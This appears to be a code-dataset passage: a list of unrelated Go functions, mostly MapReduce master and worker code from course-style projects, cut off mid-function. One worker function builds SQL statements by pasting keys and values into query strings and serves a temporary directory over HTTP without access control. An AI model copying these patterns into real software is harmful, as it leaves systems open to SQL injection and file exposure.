&c\n}", "func (mr *MapReduce) RunMaster() *list.List {\n\t// Your code here\n\tsendList := list.New()\t\t// list of jobs that need to be dispatched\n\tjobList := list.New()\t\t// list of jobs that are waiting to finish\n\tdoneChan := make(chan string)\t// dispatcher thread signals on this channel when worker finishes job successfully\n\tfailChan := make(chan struct {jobNumber int; worker string})\t// dispatched thread signals here when worker fails to process request\n\t\n\t\n\t// Add all map jobs to lists\n\tfor i := 0; i < mr.nMap; i++ {\n\t\tsendList.PushBack(i)\n\t\tjobList.PushBack(i)\n\t}\n\t\n\t// Dispatch all map jobs and wait for them to finish\n\te := sendList.Front()\n\tfor jobList.Len() > 0 {\n\t\t// dispatch jobs if any are waiting\n\t\tif e != nil {\n\t\t\tif (mr.SendJob(mr.file, Map, e.Value.(int), mr.nReduce, doneChan, failChan) == true) {\n\t\t\t\tp := e\n\t\t\t\te = e.Next()\t\t// move to next job \n\t\t\t\tsendList.Remove(p)\t// and remove current job from list only if current job successfully sent\n\t\t\t}\n\t\t}\t\n\t\t\n\t\tselect {\n\t\tcase worker := <- mr.registerChannel:\t// process new worker registrations\n\t\t\tmr.Workers[worker] = &WorkerInfo{worker, -1, false, false}\n\t\t\tfmt.Printf(\"Registered worker %v\\n\", mr.Workers[worker])\n\t\t\t\n\t\tcase worker := <- doneChan:\t\t\t\t// take finished jobs off the jobList and mark the worker as free\n\t\t\tmr.Workers[worker].busy = false\n\t\t\tjobList.Remove(FindListElement(jobList, mr.Workers[worker].currentJobNumber))\n\t\t\tmr.Workers[worker].currentJobNumber = -1\n\t\t\t\n\t\tcase failure := <- failChan:\t\t\t// if any job fails, re-add the job to the sendList and mark the worker as failed \n\t\t\tsendList.PushBack(failure.jobNumber)\n\t\t\tmr.Workers[failure.worker].failed = true\n\t\t\t\n\t\t}\n\t\t\n\t}\n\t\n\tsendList.Init()\t// clear the lists\n\tjobList.Init()\n\t\n\t// Add all reduce jobs to the lists\n\tfor i := 0; i < mr.nReduce; i++ {\n\t\tsendList.PushBack(i)\n\t\tjobList.PushBack(i)\n\t}\n\t\n\t// Dispatch all reduce jobs and wait for them to finish\n\te = sendList.Front()\n\tfor jobList.Len() > 0 {\n\t\t// dispatch jobs if any are waiting\n\t\tif e != nil {\n\t\t\tif (mr.SendJob(mr.file, Reduce, e.Value.(int), mr.nMap, doneChan, failChan) == true) {\n\t\t\t\tp := e\n\t\t\t\te = e.Next()\t\t// move to next job \n\t\t\t\tsendList.Remove(p)\t// and remove current job from list only if current job successfully sent\n\t\t\t}\n\t\t}\t\n\t\t\n\t\tselect {\n\t\tcase worker := <- mr.registerChannel:\t// process new worker registrations\n\t\t\tmr.Workers[worker] = &WorkerInfo{worker, -1, false, false}\n\t\t\tfmt.Printf(\"Registered worker %v\\n\", mr.Workers[worker])\n\t\t\t\n\t\tcase worker := <- doneChan:\t\t\t\t// take finished jobs off the jobList and mark the worker as free\n\t\t\tmr.Workers[worker].busy = false\n\t\t\tjobList.Remove(FindListElement(jobList, mr.Workers[worker].currentJobNumber))\n\t\t\tmr.Workers[worker].currentJobNumber = -1\n\t\t\t\n\t\tcase failure := <- failChan:\t\t\t// if any job fails, re-add the job to the sendList and mark the worker as failed \n\t\t\tsendList.PushBack(failure.jobNumber)\n\t\t\tmr.Workers[failure.worker].failed = true\n\t\t}\n\t\t\n\t}\n\t\n\treturn mr.KillWorkers()\t\t// kill the workers and return\n}", "func (s *RedisSystem) NewMaster(server string) {\n\tlogInfo(\"setting new master: %s\", server)\n\ts.currentMaster = NewRedisShim(server)\n}", "func main() {\n\tlog.LoadConfiguration(\"log.cfg\")\n\tlog.Info(\"Start Master\")\n\n\tcfg := loadMasterConfiguration()\n\n\tlog.Info(\"Setting go cpu number to \", cfg.Constants.CpuNumber, \" success: \", runtime.GOMAXPROCS(cfg.Constants.CpuNumber))\n\n\t// Start rest api server with tcp services for inserts and selects\n\tportNum := fmt.Sprintf(\":%d\", cfg.Ports.RestApi)\n\tvar server = restApi.Server{Port: portNum}\n\tchanReq := server.StartApi()\n\n\t// Initialize node manager\n\tlog.Info(\"Initialize node manager\")\n\tgo node.NodeManager.Manage()\n\tnodeBal := node.NewLoadBalancer(node.NodeManager.GetNodes())\n\tgo nodeBal.Balance(node.NodeManager.InfoChan)\n\n\t// Initialize reduce factory\n\tlog.Info(\"Initialize reduce factory\")\n\treduce.Initialize()\n\n\t// Initialize task manager (balancer)\n\tlog.Info(\"Initialize task manager\")\n\tgo task.TaskManager.Manage()\n\ttaskBal := task.NewBalancer(cfg.Constants.WorkersCount, cfg.Constants.JobForWorkerCount, nodeBal)\n\tgo taskBal.Balance(chanReq, cfg.Balancer.Timeout)\n\n\t// Initialize node listener\n\tlog.Info(\"Initialize node listener\")\n\tservice := fmt.Sprintf(\":%d\", cfg.Ports.NodeCommunication)\n\tlog.Debug(service)\n\tlist := node.NewListener(service)\n\tgo list.WaitForNodes(task.TaskManager.GetChan)\n\tdefer list.Close() // fire netListen.Close() when program ends\n\n\t// TODO: Wait for console instructions (q - quit for example)\n\t// Wait for some input end exit (only for now)\n\t//var i int\n\t//fmt.Scanf(\"%d\", &i)\n\tc := make(chan os.Signal, 1)\n\tsignal.Notify(c, os.Interrupt)\n\t<-c\n\treturn\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\treply := GetTask()\n\tid := reply.Id\n\tfilename := reply.Filename\n\n\tfor {\n\t\tif filename == \"error\" {\n\t\t\t//fmt.Printf(\"Error getting filename from master\\n\")\n\t\t\t//return\n\t\t\ttime.Sleep(1000 * time.Millisecond)\n\t\t\treply = GetTask()\n\t\t\tid = reply.Id\n\t\t\tfilename = reply.Filename\n\t\t}\n\t\t// fmt.Printf(\"Worker received filename: %s\\n\", filename)\n\n\t\tvar intermediate []KeyValue\n\t\t//intermediate := []KeyValue{}\n\n\t\tif reply.Type == \"map\" {\n\t\t\tfile, err := os.Open(filename)\n\t\t\tif err != nil {\n\t\t\t\t//log.Fatalf(\"cannot open %v\", filename)\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tcontent, err := ioutil.ReadAll(file)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"cannot read %v\", filename)\n\t\t\t}\n\t\t\tfile.Close()\n\n\t\t\tkva := mapf(filename, string(content))\n\t\t\tintermediate = append(intermediate, kva...)\n\t\t\tWriteIntermediate(intermediate, id, reply.NReduce)\n\t\t\tCompleteMapTask(id)\n\t\t} else if reply.Type == \"reduce\" {\n\t\t\tfor _, reduce_filename := range reply.FileList {\n\t\t\t\tfile, err := os.Open(reduce_filename)\n\t\t\t\tif err != nil {\n\t\t\t\t\t//log.Fatalf(\"cannot open %v\", reduce_filename)\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tdec := json.NewDecoder(file)\n\t\t\t\tfor {\n\t\t\t\t\tvar kv KeyValue\n\t\t\t\t\tif err := dec.Decode(&kv); err != nil {\n\t\t\t\t\t\tbreak\n\t\t\t\t\t}\n\t\t\t\t\tintermediate = append(intermediate, kv)\n\t\t\t\t}\n\t\t\t\tfile.Close()\n\t\t\t\tdefer os.Remove(reduce_filename)\n\t\t\t}\n\t\t\tsort.Sort(ByKey(intermediate))\n\t\t\t// fmt.Println(intermediate)\n\t\t\ts := []string{\"mr-out\", \"-\", strconv.Itoa(reply.Id)}\n\t\t\toname := strings.Join(s, \"\")\n\t\t\t// oname := \"mr-out-0\"\n\t\t\tofile, _ := os.Create(oname)\n\n\t\t\t//\n\t\t\t// call Reduce on each distinct key in intermediate[],\n\t\t\t// and print the result to mr-out-0.\n\t\t\t//\n\t\t\ti := 0\n\t\t\tfor i < len(intermediate) {\n\t\t\t\tj := i + 1\n\t\t\t\tfor j < len(intermediate) && intermediate[j].Key == intermediate[i].Key {\n\t\t\t\t\tj++\n\t\t\t\t}\n\t\t\t\tvalues := []string{}\n\t\t\t\tfor k := i; k < j; k++ {\n\t\t\t\t\tvalues = append(values, intermediate[k].Value)\n\t\t\t\t}\n\t\t\t\toutput := reducef(intermediate[i].Key, values)\n\n\t\t\t\t// this is the correct format for each line of Reduce output.\n\t\t\t\tfmt.Fprintf(ofile, \"%v %v\\n\", intermediate[i].Key, output)\n\n\t\t\t\ti = j\n\t\t\t}\n\t\t\tCompleteReduceTask(id)\n\t\t} else if reply.Type == \"exit\" {\n\t\t\tbreak\n\t\t}\n\n\t\ttime.Sleep(1000 * time.Millisecond)\n\t\treply = GetTask()\n\t\tid = reply.Id\n\t\tfilename = reply.Filename\n\t\tintermediate = []KeyValue{}\n\t}\n\n}", "func StartWorker(mapFunc MapFunc, reduceFunc ReduceFunc, master string) error {\n\tos.Mkdir(\"/tmp/squinn\", 1777)\n\ttasks_run := 0\n\tfor {\n\t\tlogf(\"===============================\")\n\t\tlogf(\" Starting new task.\")\n\t\tlogf(\"===============================\")\n\t\t/*\n\t\t * Call master, asking for work\n\t\t */\n\n\t\tvar resp Response\n\t\tvar req Request\n\t\terr := call(master, \"GetWork\", req, &resp)\n\t\tif err != nil {\n\t\t\tfailure(\"GetWork\")\n\t\t\ttasks_run++\n\t\t\tcontinue\n\t\t}\n\t\t/*\n\t\tif resp.Message == WORK_DONE {\n\t\t\tlog.Println(\"GetWork - Finished Working\")\n\t\t\tresp.Type =\n\t\t\tbreak\n\t\t}\n\t\t*/\n\t\t//for resp.Message == WAIT {\n\t\tfor resp.Type == TYPE_WAIT {\n\t\t\ttime.Sleep(1e9)\n\t\t\terr = call(master, \"GetWork\", req, &resp)\n\t\t\tif err != nil {\n\t\t\t\tfailure(\"GetWork\")\n\t\t\t\ttasks_run++\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\t/*\n\t\t\tif resp.Message == WORK_DONE {\n\t\t\t\tlog.Println(\"GetWork - Finished Working\")\n\t\t\t\tbreak\n\t\t\t}\n\t\t\t*/\n\t\t}\n\t\twork := resp.Work\n\t\toutput := resp.Output\n\t\tvar myAddress string\n\n\t\t/*\n\t\t * Do work\n\t\t */\n\t\t// Walks through the assigned sql records\n\t\t// Call the given mapper function\n\t\t// Receive from the output channel in a go routine\n\t\t// Feed them to the reducer through its own sql files\n\t\t// Close the sql files\n\n\t\tif resp.Type == TYPE_MAP {\n\t\t\tlogf(\"MAP ID: %d\", work.WorkerID)\n\t\t\tlog.Printf(\"Range: %d-%d\", work.Offset, work.Offset+work.Size)\n\t\t\tlog.Print(\"Running Map function on input data...\")\n\t\t\t// Load data\n\t\t\tdb, err := sql.Open(\"sqlite3\", work.Filename)\n\t\t\tif err != nil {\n\t\t\t\tlog.Println(err)\n\t\t\t\tfailure(\"sql.Open\")\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer db.Close()\n\n\n\t\t\t// Query\n\t\t\trows, err := db.Query(fmt.Sprintf(\"select key, value from %s limit %d offset %d;\", work.Table, work.Size, work.Offset))\n\t\t\tif err != nil {\n\t\t\t\tlog.Println(err)\n\t\t\t\tfailure(\"sql.Query1\")\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer rows.Close()\n\n\t\t\tfor rows.Next() {\n\t\t\t\tvar key string\n\t\t\t\tvar value string\n\t\t\t\trows.Scan(&key, &value)\n\n\t\t\t\t// TODO: TURN OFF JOURNALING\n\t\t\t\t//out.DB.Exec(\"pragma synchronous = off\");\n\t\t\t\t//out.DB.Exec(\"pragma journal_mode = off\")\n\n\t\t\t\t//TODO: CREATE INDEXES ON EACH DB SO ORDER BY WORKS FASTER\n\n\t\t\t\t// Temp storage\n\t\t\t\t// Each time the map function emits a key/value pair, you should figure out which reduce task that pair will go to.\n\t\t\t\treducer := big.NewInt(0)\n\t\t\t\treducer.Mod(hash(key), big.NewInt(int64(work.R)))\n\t\t\t\t//db_tmp, err := sql.Open(\"sqlite3\", fmt.Sprintf(\"/tmp/map_output/%d/map_out_%d.sql\", work.WorkerID, reducer.Int64())) //TODO: Directories don't work\n\t\t\t\tdb_tmp, err := sql.Open(\"sqlite3\", fmt.Sprintf(\"/tmp/squinn/map_%d_out_%d.sql\", work.WorkerID, reducer.Int64()))\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Println(err)\n\t\t\t\t\tfailure(fmt.Sprintf(\"sql.Open - /tmp/map_output/%d/map_out_%d.sql\", work.WorkerID, reducer.Int64()))\n\t\t\t\t\treturn err\n\t\t\t\t}\n\n\n\t\t\t\t// Prepare tmp database\n\t\t\t\tsqls := []string{\n\t\t\t\t\t\"create table if not exists data (key text not null, value text not null)\",\n\t\t\t\t\t\"create index if not exists data_key on data (key asc, value asc);\",\n\t\t\t\t\t\"pragma synchronous = off;\",\n\t\t\t\t\t\"pragma journal_mode = off;\",\n\t\t\t\t}\n\t\t\t\tfor _, sql := range sqls {\n\t\t\t\t\t_, err = db_tmp.Exec(sql)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tfailure(\"sql.Exec3\")\n\t\t\t\t\t\tfmt.Printf(\"%q: %s\\n\", err, sql)\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t}\n\n\n\t\t\t\t//type MapFunc func(key, value string, output chan<- Pair) error\n\t\t\t\toutChan := make(chan Pair)\n\t\t\t\tgo func() {\n\t\t\t\t\terr = mapFunc(key, value, outChan)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tfailure(\"mapFunc\")\n\t\t\t\t\t\tlog.Println(err)\n\t\t\t\t\t\t//return err\n\t\t\t\t\t}\n\t\t\t\t}()\n\n\n\t\t\t\t// Get the output from the map function's output channel\n\t\t\t\t//var pairs []Pair\n\t\t\t\tpair := <-outChan\n\t\t\t\tfor pair.Key != \"\" {\n\t\t\t\t\tkey, value = pair.Key, pair.Value\n\t\t\t\t\t// Write the data locally\n\t\t\t\t\tsql := fmt.Sprintf(\"insert into data values ('%s', '%s');\", key, value)\n\t\t\t\t\t_, err = db_tmp.Exec(sql)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tfailure(\"sql.Exec4\")\n\t\t\t\t\t\tfmt.Printf(\"map_%d_out_%d.sql\\n\", work.WorkerID, reducer.Int64())\n\t\t\t\t\t\tfmt.Println(key, value)\n\t\t\t\t\t\tlog.Printf(\"%q: %s\\n\", err, sql)\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t\t//log.Println(key, value)\n\t\t\t\t\tpair = <-outChan\n\t\t\t\t}\n\t\t\t\tdb_tmp.Close()\n\t\t\t}\n\n\t\t\tmyAddress = net.JoinHostPort(GetLocalAddress(), fmt.Sprintf(\"%d\", 4000+work.WorkerID))\n\t\t\t// Serve the files so each reducer can get them\n\t\t\t// /tmp/map_output/%d/tmp_map_out_%d.sql\n\t\t\tgo func(address string) {\n\t\t\t\t// (4000 + work.WorkerID)\n\t\t\t\t//http.Handle(\"/map_out_files/\", http.FileServer(http.Dir(fmt.Sprintf(\"/tmp/map_output/%d\", work.WorkerID)))) //TODO: Directories don't work\n\t\t\t\t//fileServer := http.FileServer(http.Dir(\"/Homework/3410/mapreduce/\"))\n\t\t\t\tfileServer := http.FileServer(http.Dir(\"/tmp/squinn/\"))\n\t\t\t\tlog.Println(\"Listening on \" + address)\n\t\t\t\tlog.Fatal(http.ListenAndServe(address, fileServer))\n\t\t\t}(myAddress)\n\t\t} else if resp.Type == TYPE_REDUCE {\n\t\t\tlogf(\"REDUCE ID: %d\", work.WorkerID)\n\t\t\t//type ReduceFunc func(key string, values <-chan string, output chan<- Pair) error\n\t\t\t// Load each input file one at a time (copied from each map task)\n\t\t\tvar filenames []string\n\t\t\tfor i, mapper := range work.MapAddresses {\n\t\t\t\t//res, err := http.Get(fmt.Sprintf(\"%d:/tmp/map_output/%d/map_out_%d.sql\", 4000+i, i, work.WorkerID)) //TODO: Directories don't work\n\t\t\t\t//map_file := fmt.Sprintf(\"http://localhost:%d/map_%d_out_%d.sql\", 4000+i, i, work.WorkerID)\n\t\t\t\tmap_file := fmt.Sprintf(\"http://%s/map_%d_out_%d.sql\", mapper, i, work.WorkerID)\n\n\t\t\t\tres, err := http.Get(map_file)\n\t\t\t\tif err != nil {\n\t\t\t\t\tfailure(\"http.Get\")\n\t\t\t\t\tlog.Fatal(err)\n\t\t\t\t}\n\n\t\t\t\tfile, err := ioutil.ReadAll(res.Body)\n\t\t\t\tres.Body.Close()\n\t\t\t\tif err != nil {\n\t\t\t\t\tfailure(\"ioutil.ReadAll\")\n\t\t\t\t\tlog.Fatal(err)\n\t\t\t\t}\n\n\t\t\t\tfilename := fmt.Sprintf(\"/tmp/squinn/map_out_%d_mapper_%d.sql\", work.WorkerID, i)\n\t\t\t\tfilenames = append(filenames, filename)\n\n\t\t\t\terr = ioutil.WriteFile(filename, file, 0777)\n\t\t\t\tif err != nil {\n\t\t\t\t\tfailure(\"file.Write\")\n\t\t\t\t\tlog.Fatal(err)\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// Combine all the rows into a single input file\n\t\t\tsqls := []string{\n\t\t\t\t\"create table if not exists data (key text not null, value text not null)\",\n\t\t\t\t\"create index if not exists data_key on data (key asc, value asc);\",\n\t\t\t\t\"pragma synchronous = off;\",\n\t\t\t\t\"pragma journal_mode = off;\",\n\t\t\t}\n\n\t\t\tfor _, file := range filenames {\n\t\t\t\tdb, err := sql.Open(\"sqlite3\", file)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Println(err)\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tdefer db.Close()\n\n\t\t\t\trows, err := db.Query(\"select key, value from data;\",)\n\t\t\t\tif err != nil {\n\t\t\t\t\tfmt.Println(err)\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tdefer rows.Close()\n\n\t\t\t\tfor rows.Next() {\n\t\t\t\t\tvar key string\n\t\t\t\t\tvar value string\n\t\t\t\t\trows.Scan(&key, &value)\n\t\t\t\t\tsqls = append(sqls, fmt.Sprintf(\"insert into data values ('%s', '%s');\", key, value))\n\t\t\t\t}\n\t\t\t}\n\n\t\t\treduce_db, err := sql.Open(\"sqlite3\", fmt.Sprintf(\"/tmp/squinn/reduce_aggregate_%d.sql\", work.WorkerID))\n\t\t\tfor _, sql := range sqls {\n\t\t\t\t_, err = reduce_db.Exec(sql)\n\t\t\t\tif err != nil {\n\t\t\t\t\tfmt.Printf(\"%q: %s\\n\", err, sql)\n\t\t\t\t}\n\t\t\t}\n\t\t\treduce_db.Close()\n\n\t\t\treduce_db, err = sql.Open(\"sqlite3\", fmt.Sprintf(\"/tmp/squinn/reduce_aggregate_%d.sql\", work.WorkerID))\n\t\t\tdefer reduce_db.Close()\n\t\t\trows, err := reduce_db.Query(\"select key, value from data order by key asc;\")\n\t\t\tif err != nil {\n\t\t\t\tlog.Println(err)\n\t\t\t\tfailure(\"sql.Query2\")\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer rows.Close()\n\n\t\t\tvar key string\n\t\t\tvar value string\n\t\t\trows.Next()\n\t\t\trows.Scan(&key, &value)\n\n\t\t\t//type ReduceFunc func(key string, values <-chan string, output chan<- Pair) error\n\t\t\tinChan := make(chan string)\n\t\t\toutChan := make(chan Pair)\n\t\t\tgo func() {\n\t\t\t\terr = reduceFunc(key, inChan, outChan)\n\t\t\t\tif err != nil {\n\t\t\t\t\tfailure(\"reduceFunc\")\n\t\t\t\t\tlog.Println(err)\n\t\t\t\t}\n\t\t\t}()\n\t\t\tinChan <- value\n\t\t\tcurrent := key\n\n\t\t\tvar outputPairs []Pair\n\t\t\t// Walk through the file's rows, performing the reduce func\n\t\t\tfor rows.Next() {\n\t\t\t\trows.Scan(&key, &value)\n\t\t\t\tif key == current {\n\t\t\t\t\tinChan <- value\n\t\t\t\t} else {\n\t\t\t\t\tclose(inChan)\n\t\t\t\t\tp := <-outChan\n\t\t\t\t\toutputPairs = append(outputPairs, p)\n\n\t\t\t\t\tinChan = make(chan string)\n\t\t\t\t\toutChan = make(chan Pair)\n\t\t\t\t\tgo func() {\n\t\t\t\t\t\terr = reduceFunc(key, inChan, outChan)\n\t\t\t\t\t\tif err != nil {\n\t\t\t\t\t\t\tfailure(\"reduceFunc\")\n\t\t\t\t\t\t\tlog.Println(err)\n\t\t\t\t\t\t}\n\t\t\t\t\t}()\n\t\t\t\t\tinChan <- value\n\t\t\t\t\tcurrent = key\n\t\t\t\t}\n\t\t\t}\n\t\t\tclose(inChan)\n\t\t\tp := <-outChan\n\t\t\toutputPairs = append(outputPairs, p)\n\n\t\t\t// Prepare tmp database\n\t\t\t// TODO: Use the command line parameter output\n\t\t\t//db_out, err := sql.Open(\"sqlite3\", fmt.Sprintf(\"/home/s/squinn/tmp/reduce_out_%d.sql\", work.WorkerID))\n\t\t\t//db_out, err := sql.Open(\"sqlite3\", fmt.Sprintf(\"/Users/Ren/tmp/reduce_out_%d.sql\", work.WorkerID))\n\t\t\tdb_out, err := sql.Open(\"sqlite3\", fmt.Sprintf(\"%s/reduce_out_%d.sql\", output, work.WorkerID))\n\t\t\tdefer db_out.Close()\n\t\t\tif err != nil {\n\t\t\t\tlog.Println(err)\n\t\t\t\tfailure(fmt.Sprintf(\"sql.Open - reduce_out_%d.sql\", work.WorkerID))\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tsqls = []string{\n\t\t\t\t\"create table if not exists data (key text not null, value text not null)\",\n\t\t\t\t\"create index if not exists data_key on data (key asc, value asc);\",\n\t\t\t\t\"pragma synchronous = off;\",\n\t\t\t\t\"pragma journal_mode = off;\",\n\t\t\t}\n\t\t\tfor _, sql := range sqls {\n\t\t\t\t_, err = db_out.Exec(sql)\n\t\t\t\tif err != nil {\n\t\t\t\t\tfailure(\"sql.Exec5\")\n\t\t\t\t\tfmt.Printf(\"%q: %s\\n\", err, sql)\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\n\t\t\t// Write the data locally\n\t\t\tfor _, op := range outputPairs {\n\t\t\t\tsql := fmt.Sprintf(\"insert into data values ('%s', '%s');\", op.Key, op.Value)\n\t\t\t\t_, err = db_out.Exec(sql)\n\t\t\t\tif err != nil {\n\t\t\t\t\tfailure(\"sql.Exec6\")\n\t\t\t\t\tfmt.Printf(\"%q: %s\\n\", err, sql)\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\t\t} else if resp.Type == TYPE_DONE {\n\t\t} else {\n\t\t\tlog.Println(\"INVALID WORK TYPE\")\n\t\t\tvar err error\n\t\t\treturn err\n\t\t}\n\n\n\n\t\t/*\n\t\t * Notify the master when I'm done\n\t\t */\n\n\t\treq.Type = resp.Type\n\t\treq.Address = myAddress\n\t\terr = call(master, \"Notify\", req, &resp)\n\t\tif err != nil {\n\t\t\tfailure(\"Notify\")\n\t\t\ttasks_run++\n\t\t\tcontinue\n\t\t}\n\n\t\tif resp.Message == WORK_DONE {\n\t\t\tlog.Println(\"Notified - Finished Working\")\n\t\t\tlog.Println(\"Waiting for word from master to clean up...\")\n\t\t\t// TODO: Wait for word from master\n\n\t\t\t//CleanUp\n\t\t\t/*\n\t\t\tos.Remove(\"aggregate.sql\")\n\t\t\tfor r:=0; r<work.R; r++ {\n\t\t\t\tfor m:=0; m<work.M; m++ {\n\t\t\t\t\tos.Remove(fmt.Sprintf(\"map_%d_out_%d.sql\", m, r))\n\t\t\t\t\tos.Remove(fmt.Sprintf(\"map_out_%d_mapper_%d.sql\", r, m))\n\t\t\t\t}\n\t\t\t\tos.Remove(fmt.Sprintf(\"reduce_aggregate_%d.sql\", r))\n\t\t\t}\n\t\t\t*/\n\t\t\tos.RemoveAll(\"/tmp/squinn\")\n\t\t\treturn nil\n\t\t}\n\t\ttasks_run++\n\n\t}\n\n\treturn nil\n}", "func main() {\n \tfmt.Println(\"Welcome to my MapReduce!\");\n\n\tif len(os.Args) != 4 {\n\t\tfmt.Printf(\"%s: see usage comments in file\\n\", os.Args[0])\n\t} else if os.Args[1] == \"master\" {\n\t\tif os.Args[3] == \"sequential\" {\n\t\t\tmapreduce.RunSingle(5, 3, os.Args[2], Map, Reduce)\n\t\t} else {\n\t\t\tmr := mapreduce.MakeMapReduce(5, 3, os.Args[2], os.Args[3])\n\t\t\t// Wait until MR is done\n\t\t\t<-mr.DoneChannel\n\t\t}\n\t} else {\n\t\tmapreduce.RunWorker(os.Args[2], os.Args[3], Map, Reduce, 100)\n\t}\n}", "func newMaster(name, binDir, rootDir string, loggers []Logger) *Master {\n\treturn &Master{\n\t\tprocBase: newProcBase(name, join(binDir, \"master\"), genLocalAddr(), loggers),\n\t\tmasterRoot: join(rootDir, name),\n\t\traftRoot: join(rootDir, name, \"raft\"),\n\t}\n}", "func NewCfnMaster(scope awscdk.Construct, id *string, props *CfnMasterProps) CfnMaster {\n\t_init_.Initialize()\n\n\tj := jsiiProxy_CfnMaster{}\n\n\t_jsii_.Create(\n\t\t\"monocdk.aws_guardduty.CfnMaster\",\n\t\t[]interface{}{scope, id, props},\n\t\t&j,\n\t)\n\n\treturn &j\n}", "func NewMasterWorker(Jobs map[string]Job, config string, indload bool) (MasterWorker, error) {\n\tmaster := MasterWorker{\n\t\tpathjson: config,\n\t\tJobs: Jobs,\n\t}\n\terr := master.LoadConfig(config)\n\tif err != nil {\n\t\treturn master, err\n\t}\n\tif indload {\n\t\terr := master.Loadmaster()\n\t\tif err != nil {\n\t\t\treturn master, err\n\t\t}\n\t}\n\n\treturn master, nil\n}", "func CreateMasterService(cr *redisv1alpha1.Redis) {\n\tmasterReplicas := cr.Spec.Size\n\tfor serviceCount := 0; serviceCount <= int(*masterReplicas)-1; serviceCount++ {\n\t\tlabels := map[string]string{\n\t\t\t\"app\": cr.ObjectMeta.Name + \"-master\",\n\t\t\t\"role\": \"master\",\n\t\t\t\"statefulset.kubernetes.io/pod-name\": cr.ObjectMeta.Name + \"-master-\" + strconv.Itoa(serviceCount),\n\t\t}\n\t\tserviceDefinition := GenerateServiceDef(cr, labels, int32(redisPort), \"master\", cr.ObjectMeta.Name+\"-master-\"+strconv.Itoa(serviceCount), \"None\")\n\t\tserviceBody, err := GenerateK8sClient().CoreV1().Services(cr.Namespace).Get(cr.ObjectMeta.Name+\"-master-\"+strconv.Itoa(serviceCount), metav1.GetOptions{})\n\t\tservice := ServiceInterface{\n\t\t\tExistingService: serviceBody,\n\t\t\tNewServiceDefinition: serviceDefinition,\n\t\t\tServiceType: \"master\",\n\t\t}\n\t\tCompareAndCreateService(cr, service, err)\n\t}\n}", "func (m *Master) Name() string {\n\treturn \"Master Machines\"\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\tfor {\n\t\tt := Task{}\n\t\tcall(\"Master.Assign\", &t, &t)\n\n\t\t// TODO heart beat\n\t\t\n\t\tswitch t.Phase {\n\t\tcase MapPhase:\n\t\t\trunMap(t, mapf)\n\t\tcase ReducePhase:\n\t\t\trunReduce(t, reducef)\n\t\tdefault:\n\t\t\ttime.Sleep(1)\n\t\t}\n\t}\n}", "func masterMain(ln net.Listener) {\n\tm := &Master{}\n\tm.startTime = time.Now()\n\tm.lastInput = time.Now()\n\tm.suppressions = newPersistentSet(filepath.Join(*flagWorkdir, \"suppressions\"))\n\tm.crashers = newPersistentSet(filepath.Join(*flagWorkdir, \"crashers\"))\n\tm.corpus = newPersistentSet(filepath.Join(*flagWorkdir, \"corpus\"))\n\tif len(m.corpus.m) == 0 {\n\t\tm.corpus.add(Artifact{[]byte{}, 0, false})\n\t}\n\n\tm.slaves = make(map[int]*MasterSlave)\n\tgo masterLoop(m)\n\n\ts := rpc.NewServer()\n\ts.Register(m)\n\ts.Accept(ln)\n}", "func Worker(mapf func(string, string) []KeyValue, reducef func(string, []string) string) {\n\t// 单机运行,直接使用 PID 作为 Worker ID,方便 debug\n\tid := strconv.Itoa(os.Getpid())\n\tlog.Printf(\"Worker %s started\\n\", id)\n\n\t// 进入循环,向 Coordinator 申请 Task\n\tvar lastTaskType string\n\tvar lastTaskIndex int\n\tfor {\n\t\targs := ApplyForTaskArgs{\n\t\t\tWorkerID: id,\n\t\t\tLastTaskType: lastTaskType,\n\t\t\tLastTaskIndex: lastTaskIndex,\n\t\t}\n\t\treply := ApplyForTaskReply{}\n\t\tcall(\"Coordinator.ApplyForTask\", &args, &reply)\n\n\t\tif reply.TaskType == \"\" {\n\t\t\t// MR 作业已完成,退出\n\t\t\tlog.Printf(\"Received job finish signal from coordinator\")\n\t\t\tbreak\n\t\t}\n\n\t\tlog.Printf(\"Received %s task %d from coordinator\", reply.TaskType, reply.TaskIndex)\n\t\tif reply.TaskType == MAP {\n\t\t\t// 读取输入数据\n\t\t\tfile, err := os.Open(reply.MapInputFile)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"Failed to open map input file %s: %e\", reply.MapInputFile, err)\n\t\t\t}\n\t\t\tcontent, err := ioutil.ReadAll(file)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"Failed to read map input file %s: %e\", reply.MapInputFile, err)\n\t\t\t}\n\t\t\t// 传递输入数据至 MAP 函数,得到中间结果\n\t\t\tkva := mapf(reply.MapInputFile, string(content))\n\t\t\t// 按 Key 的 Hash 值对中间结果进行分桶\n\t\t\thashedKva := make(map[int][]KeyValue)\n\t\t\tfor _, kv := range kva {\n\t\t\t\thashed := ihash(kv.Key) % reply.ReduceNum\n\t\t\t\thashedKva[hashed] = append(hashedKva[hashed], kv)\n\t\t\t}\n\t\t\t// 写出中间结果文件\n\t\t\tfor i := 0; i < reply.ReduceNum; i++ {\n\t\t\t\tofile, _ := os.Create(tmpMapOutFile(id, reply.TaskIndex, i))\n\t\t\t\tfor _, kv := range hashedKva[i] {\n\t\t\t\t\tfmt.Fprintf(ofile, \"%v\\t%v\\n\", kv.Key, 